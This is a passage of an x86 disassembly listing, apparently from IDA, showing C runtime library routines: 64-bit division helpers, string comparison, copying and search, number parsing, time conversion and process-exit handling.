jnz short loc_416FFC
retn
; ---------------------------------------------------------------------------
loc_416FFC: ; CODE XREF: sub_416FF2+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C300
add esp, 10h
retn
sub_416FF2 endp
; =============== S U B R O U T I N E =======================================
sub_417012 proc near ; CODE XREF: sub_404A47+18�p
; sub_40636F+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_416FF2
add esp, 0Ch
retn
sub_417012 endp
; =============== S U B R O U T I N E =======================================
sub_417025 proc near ; CODE XREF: sub_40539F+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_495374 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_417045
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
call sub_41C4E8
pop ecx
loc_417041: ; CODE XREF: sub_417025+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417045: ; CODE XREF: sub_417025+D�j
test al, 1
jz short loc_417066
test [esp+arg_4], 2
jz short loc_417066
mov dword_4927F4, 0Dh
mov dword_4927F8, 5
jmp short loc_417041
; ---------------------------------------------------------------------------
loc_417066: ; CODE XREF: sub_417025+22�j
; sub_417025+29�j
xor eax, eax
retn
sub_417025 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417070 proc near ; CODE XREF: sub_4053BF+3F�p
; sub_4140AD+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_417092
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_4170D3
; ---------------------------------------------------------------------------
loc_417092: ; CODE XREF: sub_417070+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_4170A0: ; CODE XREF: sub_417070+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4170A0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_4170CE
cmp edx, [esp+8+arg_4]
ja short loc_4170CE
jb short loc_4170CF
cmp eax, [esp+8+arg_0]
jbe short loc_4170CF
loc_4170CE: ; CODE XREF: sub_417070+4E�j
; sub_417070+54�j
dec esi
loc_4170CF: ; CODE XREF: sub_417070+56�j
; sub_417070+5C�j
xor edx, edx
mov eax, esi
loc_4170D3: ; CODE XREF: sub_417070+20�j
pop esi
pop ebx
retn 10h
sub_417070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4170E0 proc near ; CODE XREF: sub_4053BF+2D�p
; sub_4140AD+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_417101
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_417151
; ---------------------------------------------------------------------------
loc_417101: ; CODE XREF: sub_4170E0+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_41710F: ; CODE XREF: sub_4170E0+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_41710F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_41713A
cmp edx, [esp+4+arg_4]
ja short loc_41713A
jb short loc_417142
cmp eax, [esp+4+arg_0]
jbe short loc_417142
loc_41713A: ; CODE XREF: sub_4170E0+4A�j
; sub_4170E0+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_417142: ; CODE XREF: sub_4170E0+52�j
; sub_4170E0+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_417151: ; CODE XREF: sub_4170E0+1F�j
pop ebx
retn 10h
sub_4170E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417160 proc near ; CODE XREF: sub_405512+5F�p
; sub_405512+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_417181
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_417181: ; CODE XREF: sub_417160+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41719D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41719D: ; CODE XREF: sub_417160+27�j
or eax, eax
jnz short loc_4171B9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4171FA
; ---------------------------------------------------------------------------
loc_4171B9: ; CODE XREF: sub_417160+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_4171C7: ; CODE XREF: sub_417160+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4171C7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_4171F5
cmp edx, [esp+0Ch+arg_4]
ja short loc_4171F5
jb short loc_4171F6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_4171F6
loc_4171F5: ; CODE XREF: sub_417160+85�j
; sub_417160+8B�j
dec esi
loc_4171F6: ; CODE XREF: sub_417160+8D�j
; sub_417160+93�j
xor edx, edx
mov eax, esi
loc_4171FA: ; CODE XREF: sub_417160+57�j
dec edi
jnz short loc_417204
neg edx
neg eax
sbb edx, 0
loc_417204: ; CODE XREF: sub_417160+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_417160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417210 proc near ; CODE XREF: sub_405941+1D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41725C
mov edx, [esp+arg_0]
push esi
push edi
mov esi, edx
mov edi, [esp+8+arg_4]
or edx, edi
and edx, 3
jz short loc_41725D
test eax, 1
jz short loc_41723D
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41728A
inc esi
inc edi
dec eax
jz short loc_41725A
loc_41723D: ; CODE XREF: sub_417210+20�j
; sub_417210+48�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41728A
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41728A
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41723D
loc_41725A: ; CODE XREF: sub_417210+2B�j
; sub_417210+84�j
pop edi
pop esi
locret_41725C: ; CODE XREF: sub_417210+6�j
retn
; ---------------------------------------------------------------------------
loc_41725D: ; CODE XREF: sub_417210+19�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_417292
repe cmpsd
jz short loc_417292
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_417285
cmp ch, dh
jnz short loc_417285
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_417285
cmp ch, dh
loc_417285: ; CODE XREF: sub_417210+63�j
; sub_417210+67�j ...
mov eax, 0
loc_41728A: ; CODE XREF: sub_417210+26�j
; sub_417210+33�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417292: ; CODE XREF: sub_417210+55�j
; sub_417210+59�j
test eax, eax
jz short loc_41725A
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_417285
dec eax
jz short loc_4172B9
cmp dh, ch
jnz short loc_417285
dec eax
jz short loc_4172B9
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_417285
dec eax
loc_4172B9: ; CODE XREF: sub_417210+8F�j
; sub_417210+96�j
pop edi
pop esi
retn
sub_417210 endp
; ---------------------------------------------------------------------------
push 0
push dword ptr [esp+10h]
push dword ptr [esp+10h]
push dword ptr [esp+10h]
call sub_4172D3
add esp, 10h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172D3 proc near ; CODE XREF: .text:004172CA�p
; sub_4174DB+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_4172EB: ; CODE XREF: sub_4172D3+46�j
cmp dword_435E38, 1
jle short loc_417303
movzx eax, bl
push 8
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_417312
; ---------------------------------------------------------------------------
loc_417303: ; CODE XREF: sub_4172D3+1F�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_417312: ; CODE XREF: sub_4172D3+2E�j
test eax, eax
jz short loc_41731B
mov bl, [esi]
inc esi
jmp short loc_4172EB
; ---------------------------------------------------------------------------
loc_41731B: ; CODE XREF: sub_4172D3+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_417329
or [ebp+arg_C], 2
jmp short loc_41732E
; ---------------------------------------------------------------------------
loc_417329: ; CODE XREF: sub_4172D3+4E�j
cmp bl, 2Bh
jnz short loc_417334
loc_41732E: ; CODE XREF: sub_4172D3+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_417334: ; CODE XREF: sub_4172D3+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_4174CB
cmp eax, 1
jz loc_4174CB
cmp eax, 24h
jg loc_4174CB
push 10h
test eax, eax
pop ecx
jnz short loc_41737C
cmp bl, 30h
jz short loc_417366
mov [ebp+arg_8], 0Ah
jmp short loc_417398
; ---------------------------------------------------------------------------
loc_417366: ; CODE XREF: sub_4172D3+88�j
mov al, [esi]
cmp al, 78h
jz short loc_417379
cmp al, 58h
jz short loc_417379
mov [ebp+arg_8], 8
jmp short loc_417398
; ---------------------------------------------------------------------------
loc_417379: ; CODE XREF: sub_4172D3+97�j
; sub_4172D3+9B�j
mov [ebp+arg_8], ecx
loc_41737C: ; CODE XREF: sub_4172D3+83�j
cmp [ebp+arg_8], ecx
jnz short loc_417398
cmp bl, 30h
jnz short loc_417398
mov al, [esi]
cmp al, 78h
jz short loc_417390
cmp al, 58h
jnz short loc_417398
loc_417390: ; CODE XREF: sub_4172D3+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_417398: ; CODE XREF: sub_4172D3+91�j
; sub_4172D3+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_4173A8: ; CODE XREF: sub_4172D3+16C�j
cmp dword_435E38, 1
movzx esi, bl
jle short loc_4173C0
push 4
push esi
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_4173CB
; ---------------------------------------------------------------------------
loc_4173C0: ; CODE XREF: sub_4172D3+DF�j
mov eax, off_435C2C
mov al, [eax+esi*2]
and eax, 4
loc_4173CB: ; CODE XREF: sub_4172D3+EB�j
test eax, eax
jz short loc_4173D7
movsx ecx, bl
sub ecx, 30h
jmp short loc_417409
; ---------------------------------------------------------------------------
loc_4173D7: ; CODE XREF: sub_4172D3+FA�j
cmp dword_435E38, 1
jle short loc_4173EB
push edi
push esi
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_4173F6
; ---------------------------------------------------------------------------
loc_4173EB: ; CODE XREF: sub_4172D3+10B�j
mov eax, off_435C2C
mov ax, [eax+esi*2]
and eax, edi
loc_4173F6: ; CODE XREF: sub_4172D3+116�j
test eax, eax
jz short loc_417444
movsx eax, bl
push eax
call sub_41C557
pop ecx
mov ecx, eax
sub ecx, 37h
loc_417409: ; CODE XREF: sub_4172D3+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_417444
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41742E
jnz short loc_417428
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41742E
loc_417428: ; CODE XREF: sub_4172D3+147�j
or [ebp+arg_C], 4
jmp short loc_417437
; ---------------------------------------------------------------------------
loc_41742E: ; CODE XREF: sub_4172D3+145�j
; sub_4172D3+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_417437: ; CODE XREF: sub_4172D3+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_4173A8
; ---------------------------------------------------------------------------
loc_417444: ; CODE XREF: sub_4172D3+125�j
; sub_4172D3+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_417462
test edx, edx
jz short loc_41745C
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41745C: ; CODE XREF: sub_4172D3+181�j
and [ebp+var_8], 0
jmp short loc_4174AF
; ---------------------------------------------------------------------------
loc_417462: ; CODE XREF: sub_4172D3+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_417488
test cl, 1
jnz short loc_4174AF
and ecx, 2
jz short loc_41747F
cmp [ebp+var_8], 80000000h
ja short loc_417488
loc_41747F: ; CODE XREF: sub_4172D3+1A1�j
test ecx, ecx
jnz short loc_4174AF
cmp [ebp+var_8], eax
jbe short loc_4174AF
loc_417488: ; CODE XREF: sub_4172D3+197�j
; sub_4172D3+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_4927F4, 22h
jz short loc_41749E
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4174AF
; ---------------------------------------------------------------------------
loc_41749E: ; CODE XREF: sub_4172D3+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_4174AF: ; CODE XREF: sub_4172D3+18D�j
; sub_4172D3+19C�j ...
test edx, edx
jz short loc_4174B8
mov eax, [ebp+var_4]
mov [edx], eax
loc_4174B8: ; CODE XREF: sub_4172D3+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_4174C6
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_4174C6: ; CODE XREF: sub_4172D3+1E9�j
mov eax, [ebp+var_8]
jmp short loc_4174D6
; ---------------------------------------------------------------------------
loc_4174CB: ; CODE XREF: sub_4172D3+66�j
; sub_4172D3+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4174D4
mov [eax], edi
loc_4174D4: ; CODE XREF: sub_4172D3+1FD�j
xor eax, eax
loc_4174D6: ; CODE XREF: sub_4172D3+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_4172D3 endp
; =============== S U B R O U T I N E =======================================
sub_4174DB proc near ; CODE XREF: .text:0040600D�p
; sub_4087B3+2848�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4172D3
add esp, 10h
retn
sub_4174DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174F2 proc near ; CODE XREF: .text:00405B9E�p
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call ds:dword_49534C ; GetLocalTime
lea eax, [ebp+var_20]
push eax
call ds:dword_49543C ; GetSystemTime
mov ax, [ebp+var_16]
cmp ax, word_4927EA
jnz short loc_417557
mov ax, [ebp+var_18]
cmp ax, word_4927E8
jnz short loc_417557
mov ax, [ebp+var_1A]
cmp ax, word_4927E6
jnz short loc_417557
mov ax, [ebp+var_1E]
cmp ax, word_4927E2
jnz short loc_417557
mov ax, [ebp+var_20]
cmp ax, word_4927E0
jnz short loc_417557
mov eax, dword_4927D8
jmp short loc_41759C
; ---------------------------------------------------------------------------
loc_417557: ; CODE XREF: sub_4174F2+28�j
; sub_4174F2+35�j ...
lea eax, [ebp+var_CC]
push eax
call ds:dword_495438 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz short loc_417584
cmp eax, 2
jnz short loc_417580
cmp [ebp+var_32], 0
jz short loc_417580
cmp [ebp+var_24], 0
jz short loc_417580
push 1
pop eax
jmp short loc_417587
; ---------------------------------------------------------------------------
loc_417580: ; CODE XREF: sub_4174F2+7A�j
; sub_4174F2+81�j ...
xor eax, eax
jmp short loc_417587
; ---------------------------------------------------------------------------
loc_417584: ; CODE XREF: sub_4174F2+75�j
or eax, 0FFFFFFFFh
loc_417587: ; CODE XREF: sub_4174F2+8C�j
; sub_4174F2+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_4927E0
movsd
movsd
movsd
movsd
pop edi
mov dword_4927D8, eax
pop esi
loc_41759C: ; CODE XREF: sub_4174F2+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_41C623
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_4175CC
mov [ecx], eax
locret_4175CC: ; CODE XREF: sub_4174F2+D6�j
leave
retn
sub_4174F2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4175D0 proc near ; CODE XREF: .text:004066EE�p
; sub_4087B3+42C�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_417641
sub_4175D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4175E0 proc near ; CODE XREF: sub_406B82+15D�p
; sub_4087B3+435�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4175FC
loc_4175ED: ; CODE XREF: sub_4175E0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41762F
test ecx, 3
jnz short loc_4175ED
loc_4175FC: ; CODE XREF: sub_4175E0+B�j
; sub_4175E0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4175FC
mov eax, [ecx-4]
test al, al
jz short loc_41763E
test ah, ah
jz short loc_417639
test eax, 0FF0000h
jz short loc_417634
test eax, 0FF000000h
jz short loc_41762F
jmp short loc_4175FC
; ---------------------------------------------------------------------------
loc_41762F: ; CODE XREF: sub_4175E0+12�j
; sub_4175E0+4B�j
lea edi, [ecx-1]
jmp short loc_417641
; ---------------------------------------------------------------------------
loc_417634: ; CODE XREF: sub_4175E0+44�j
lea edi, [ecx-2]
jmp short loc_417641
; ---------------------------------------------------------------------------
loc_417639: ; CODE XREF: sub_4175E0+3D�j
lea edi, [ecx-3]
jmp short loc_417641
; ---------------------------------------------------------------------------
loc_41763E: ; CODE XREF: sub_4175E0+39�j
lea edi, [ecx-4]
loc_417641: ; CODE XREF: sub_4175D0+5�j
; sub_4175E0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_417666
loc_41764D: ; CODE XREF: sub_4175E0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4176B8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41764D
jmp short loc_417666
; ---------------------------------------------------------------------------
loc_417661: ; CODE XREF: sub_4175E0+9E�j
; sub_4175E0+B8�j
mov [edi], edx
add edi, 4
loc_417666: ; CODE XREF: sub_4175E0+6B�j
; sub_4175E0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_417661
test dl, dl
jz short loc_4176B8
test dh, dh
jz short loc_4176AF
test edx, 0FF0000h
jz short loc_4176A2
test edx, 0FF000000h
jz short loc_41769A
jmp short loc_417661
; ---------------------------------------------------------------------------
loc_41769A: ; CODE XREF: sub_4175E0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4176A2: ; CODE XREF: sub_4175E0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4176AF: ; CODE XREF: sub_4175E0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4176B8: ; CODE XREF: sub_4175E0+72�j
; sub_4175E0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4175E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4176C0 proc near ; CODE XREF: .text:004066E1�p
; sub_406B82+101�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_4176D9: ; CODE XREF: sub_4176C0+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_4176D9
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_417701
mov edx, dword_4927F0
loc_417701: ; CODE XREF: sub_4176C0+39�j
; sub_4176C0+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_417721
test al, al
jz short loc_417721
inc edx
jmp short loc_417701
; ---------------------------------------------------------------------------
loc_417721: ; CODE XREF: sub_4176C0+58�j
; sub_4176C0+5C�j
mov ebx, edx
loc_417723: ; CODE XREF: sub_4176C0+81�j
mov al, [edx]
test al, al
jz short loc_417747
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_417743
inc edx
jmp short loc_417723
; ---------------------------------------------------------------------------
loc_417743: ; CODE XREF: sub_4176C0+7E�j
and byte ptr [edx], 0
inc edx
loc_417747: ; CODE XREF: sub_4176C0+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_4927F0, edx
and eax, ebx
pop ebx
leave
retn
sub_4176C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_417760 proc near ; CODE XREF: .text:004066A5�p
; .text:004066D1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_4177DA
mov dh, [ecx+1]
test dh, dh
jz short loc_4177C7
loc_417778: ; CODE XREF: sub_417760+52�j
; sub_417760+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_41779A
test al, al
jz short loc_417794
loc_417789: ; CODE XREF: sub_417760+32�j
mov al, [esi]
inc esi
loc_41778C: ; CODE XREF: sub_417760+3F�j
cmp al, dl
jz short loc_41779A
test al, al
jnz short loc_417789
loc_417794: ; CODE XREF: sub_417760+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41779A: ; CODE XREF: sub_417760+23�j
; sub_417760+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_41778C
lea edi, [esi-1]
loc_4177A4: ; CODE XREF: sub_417760+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4177D3
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417778
mov al, [ecx+3]
test al, al
jz short loc_4177D3
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4177A4
jmp short loc_417778
; ---------------------------------------------------------------------------
loc_4177C7: ; CODE XREF: sub_417760+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_417B66
; ---------------------------------------------------------------------------
loc_4177D3: ; CODE XREF: sub_417760+49�j
; sub_417760+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4177DA: ; CODE XREF: sub_417760+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417760 endp
; =============== S U B R O U T I N E =======================================
sub_4177E0 proc near ; CODE XREF: sub_417ED0+93�p
mov eax, off_435A6C
test eax, eax
jz short loc_4177EB
call eax ; sub_415E6A
loc_4177EB: ; CODE XREF: sub_4177E0+7�j
push offset dword_42962C
push offset dword_429314
call sub_4178E6
push offset dword_429210
push offset dword_429000
call sub_4178E6
add esp, 10h
retn
sub_4177E0 endp
; =============== S U B R O U T I N E =======================================
sub_41780D proc near ; CODE XREF: sub_417ED0+D2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_41784D
add esp, 0Ch
retn
sub_41780D endp
; =============== S U B R O U T I N E =======================================
sub_41781E proc near ; CODE XREF: .text:00417FC1�p
; sub_417FC6+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_41784D
add esp, 0Ch
retn
sub_41781E endp
; ---------------------------------------------------------------------------
push 1
push 0
push 0
call sub_41784D
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
push 1
push 1
push 0
call sub_41784D
add esp, 0Ch
retn
; =============== S U B R O U T I N E =======================================
sub_41784D proc near ; CODE XREF: sub_41780D+8�p
; sub_41781E+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_49283C, edi
jnz short loc_41786A
push [esp+4+arg_0]
call ds:dword_4953F4 ; GetCurrentProcess
push eax
call ds:dword_4953F8 ; TerminateProcess
loc_41786A: ; CODE XREF: sub_41784D+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_492838, edi
mov byte_492834, bl
jnz short loc_4178BE
mov eax, dword_49429C
test eax, eax
jz short loc_4178AD
mov ecx, dword_494298
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_4178AC
loc_417899: ; CODE XREF: sub_41784D+5D�j
mov eax, [esi]
test eax, eax
jz short loc_4178A1
call eax
loc_4178A1: ; CODE XREF: sub_41784D+50�j
sub esi, 4
cmp esi, dword_49429C
jnb short loc_417899
loc_4178AC: ; CODE XREF: sub_41784D+4A�j
pop esi
loc_4178AD: ; CODE XREF: sub_41784D+3C�j
push offset dword_429938
push offset dword_429730
call sub_4178E6
pop ecx
pop ecx
loc_4178BE: ; CODE XREF: sub_41784D+33�j
push offset dword_429C44
push offset dword_429A3C
call sub_4178E6
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_4178E4
push [esp+4+arg_0]
mov dword_49283C, edi
call ds:dword_495350 ; ExitProcess
loc_4178E4: ; CODE XREF: sub_41784D+85�j
pop edi
retn
sub_41784D endp
; =============== S U B R O U T I N E =======================================
sub_4178E6 proc near ; CODE XREF: sub_4177E0+15�p
; sub_4177E0+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_4178EB: ; CODE XREF: sub_4178E6+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_4178FE
mov eax, [esi]
test eax, eax
jz short loc_4178F9
call eax
loc_4178F9: ; CODE XREF: sub_4178E6+F�j
add esi, 4
jmp short loc_4178EB
; ---------------------------------------------------------------------------
loc_4178FE: ; CODE XREF: sub_4178E6+9�j
pop esi
retn
sub_4178E6 endp
; =============== S U B R O U T I N E =======================================
